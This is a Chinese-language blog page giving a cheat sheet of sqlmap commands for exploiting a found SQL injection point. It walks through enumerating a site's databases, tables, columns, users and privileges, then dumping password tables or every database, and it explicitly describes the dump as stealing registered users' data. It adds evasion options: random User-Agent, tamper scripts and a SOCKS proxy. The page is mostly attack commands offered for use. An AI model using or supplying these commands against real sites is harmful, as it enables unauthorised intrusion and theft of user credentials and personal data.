计算机管理系统:电脑网络技术记录本

SQL注入

当前位置:首页 > 安全渗透 > SQL注入

sqlmap发现注入点后,拖库教程详细总结

1,sqlmap.py -u "url"#检测目标网站是否存在注入


2,sqlmap.py -u "url" --dbs#获取对方数据库所有库的名称


3,sqlmap.py -u "url" -D "security" --tables#获取security库下的表


4,sqlmap.py -u "url" -D "security" -T "email,users" --column#获取email表,users表中的字段


5,sqlmap.py -u "url" -D "security" -T "users" -C "id,username,password" --dump#导出数据指定的数据


6,sqlmap.py -u "url" --dump-all#拖库,即把网站注册用户的资料数据库盗走的行为


7,sqlmap.py -u "url" --current-user#获取当前用户名称


8,sqlmap.py -u "url" --current-db#获取当前使用的数据的名称


9,sqlmap.py -u "url" -r 1.txt#指定文件检测注入


10,sqlmap.py -u "url" --dbms "mysql"#指定数据库类型进行检测


11,sqlmap.py -r 1.txt -p "参数名"#post型注入,-p指定哪个参数注入


12,sqlmap.py -u "url" --forms#自动搜索表单并测试注入


13,sqlmap.py -u "url" --dbs -v 4#显示sqlmap注入的信息

  有七个等级,默认为1:

  0.只显示python错误以及严重的信息

  1.同时显示基本信息和警告信息

  2.同时显示debug信息

  3.同时显示注入的payload

  4.同时显示http请求

  5.同时显示http响应头

  6.同时显示http响应页面


14.sqlmap.py -u "url" --tamper unmagicquotes#检测宽字节注入


15.sqlmap.py -u "url" --is-dba#判断当前用户是否为数据库管理员权限


16.sqlmap.py -u "url" --random-agent#随机User-Agent头


17.探测等级参数:–level

 共有五个等级,默认为1级,这个参数不仅影响用哪些payload同时也会影响测试注入的注入点,GET和POST的数据都会测试,HTTP cookie在level为2 的时候就会测试,HTTP User-Agent/Referer头在level为3的时候就会测试,在不确定哪个payload或者参数为注入点的时候,为了保证全面性,建议使用高的level值


18.风险等级参数:–risk

 共有四个风险等级,默认是会测试大部分测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试


19.sqlmap.py -u "url" --users#列数据库用户


20.sqlmap.py -u "url" --batch#采用默认配置对提示进行设置,即不会询问你的输入


21.sqlmap.py -u "url" --roles 或者 --privileges#列用户以及权限


22.伪静态注入(使用sqlmap进行):

 sqlmap.py -u "www.xxx.com/index.php/news/id/203*.html"

 sqlmap.py -u "www.xxx.com/index.php/news/id/10*"


23.使用代理进行注入

  --proxy=socks5://127.0.0.1:1080

sqlmap发现注入点后,拖库教程详细总结

上一篇:sqlmap中文用户手册,使用参数介绍

下一篇:已经是最后一篇

文章评论

表情

共 0 条评论,查看全部
  • 这篇文章还没有收到评论,赶紧来抢沙发吧~